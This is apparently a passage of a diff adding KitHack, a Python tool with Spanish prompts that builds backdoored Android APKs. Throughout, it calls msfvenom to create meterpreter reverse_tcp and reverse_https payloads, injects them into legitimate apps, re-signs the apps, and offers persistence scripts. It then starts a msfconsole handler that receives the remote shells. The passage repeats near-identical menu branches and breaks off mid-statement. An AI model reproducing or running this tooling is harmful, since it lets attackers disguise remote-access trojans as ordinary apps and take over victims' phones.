"rm -rf output/payload output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + # Salida de bucle + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format( + RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif m == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) + location = os.getcwd() + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("{}\n[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif pay == "03": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", + "*.*")), + ) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + "\n") + file.write(mainout) + file.close() + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/payload -o output/kithack.apk") + location = os.getcwd() + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + # Salida de bucle + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format( + RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif m == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) + location = os.getcwd() + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("{}\n[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif pay == "04": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", + "*.*")), + ) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + "\n") + file.write(mainout) + file.close() + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/payload -o output/kithack.apk") + location = os.getcwd() + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + # Salida de bucle + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format( + RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para 